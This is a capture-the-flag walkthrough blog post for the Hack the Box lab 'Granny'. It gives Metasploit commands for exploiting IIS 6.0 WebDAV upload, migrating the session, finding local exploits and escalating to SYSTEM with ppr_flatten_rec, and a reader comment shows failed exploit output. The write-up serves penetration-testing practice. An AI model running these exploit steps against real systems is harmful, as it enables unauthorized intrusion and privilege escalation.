CTF Challenges

Hack the Box Challenge: Granny Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Granny” which is categories as retired lab presented by Hack the Box for making online penetration practices. Challenges in this lab are not hard to complete although they are like a brain teaser for the beginner as well as for expert penetration tester too. 

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Granny is so let’s initiate with nmap port enumeration.

nmap -A

From the given below image, you can observe we found port 80 is open and Microsoft IIS 6.0 is running in victim’s network.

Significant port 80 is open in the victim’s network we preferred to explore his IP in the browser and resulting web page is shown below.

Since we know Microsoft IIS httpd 6.0 is running in victims system therefore when I Google I found Rapid 7 exploit for this as highlighted in given below image.

Without wasting time I open a new terminal and type msfconsole for loading Metasploit framework and use module iis_webdav for exploiting targets system.

use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(windows/iis/iis_webdav_upload_asp) >set rhost
msf exploit(windows/iis/iis_webdav_upload_asp) >run

From given below image you can observe meterpreter shell session1 opened for accessing victim tty shell.

Every time my meterpreter session get died therefore I go post exploitation for migrating current process into another process by executing the following module.

use post/windows/manage/migrate
msf post(windows/manage/migrate)>set session 1
msf post(windows/manage/migrate)> run

Above module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.

Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for the further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.

use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploit

Wonderful!! Exploit Suggester truly proof itself by suggesting another exploit name to which target is vulnerable. So now we will go with the last option as highlighted in the image.

At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.

use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) >set session 1
msf exploit(windows/local/ppr_flatten_rec) >set wait 20
msf exploit(windows/local/ppr_flatten_rec) > set lhost
msf exploit(windows/local/ppr_flatten_rec) > exploit

Nice!! It works and we got meterpreter session 2 as system user and you can check in below image.

meterpreter > getuid

As we have tty shell that has system privileges now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.

meterpreter > ls

Here we found Document and setting let’s explore

Inside C:\Document and Setting\Lakis\Desktop I found the user.txt file and used the type “filename” command for reading this file.

cd Lakis/Desktop
cat user.txt

Great!! We got our 1st flag successfully

Inside C:\Document and Setting\Administrtator\Desktop I found the root.txt file and used the type “filename” command for reading this file.

cd Administrator/Desktop
cat root.txt

Great!! We got our 2nd flag successfully

Breaching this lab was an interesting and enjoyable moment for me. It will take less time if you are aware of proper Metasploit exploits. Therefore I will give all Glory to Metasploit for making this challenge easy for me.

Happy Hacking!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

3 thoughts on “Hack the Box Challenge: Granny Walkthrough

  1. msf exploit(windows/iis/iis_webdav_upload_asp) > set rhost
    rhost =>
    msf exploit(windows/iis/iis_webdav_upload_asp) > run

    [*] Started reverse TCP handler on
    [*] Checking /metasploit106997395.asp
    [*] Uploading 612556 bytes to /metasploit106997395.txt…
    [-] Upload failed on /metasploit106997395.txt [500 Internal Server Error]
    [*] Exploit completed, but no session was created.

    Any idea of above failed?

Leave a Reply

Your email address will not be published. Required fields are marked *